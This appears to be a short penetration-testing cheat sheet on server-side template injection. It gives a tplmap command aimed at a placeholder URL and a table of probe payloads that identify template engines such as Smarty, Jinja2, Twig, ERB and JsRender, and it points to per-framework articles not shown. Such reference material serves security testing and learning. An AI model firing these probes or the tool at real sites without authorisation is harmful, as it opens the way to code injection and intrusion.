SSTI (Server-Side Template Injection)

Automation

Tplmap is a program for Server-Side Template Injection and Code Injection.

./tplmap.py -u http://vulnerable.com/?name=test


Identify the Template Engine/Framework/Language

Payload Template Engine/Framework/Language
a{*comment*}b Smarty
#{ 2*3 } Pug, Spring
*{ 2*3 } Spring
${"z".join("ab")} Mako, ???
{{ '7'*7 }} Angular, Django, Flask, Go, Jinja2, Tornado, Twig, ???
{{:2*3}} JsRender
{% debug %} Django
<%= 7*7 %> ERB (Embedded Ruby)


SSTI for Each Framework

Please see each article for details about SSTI.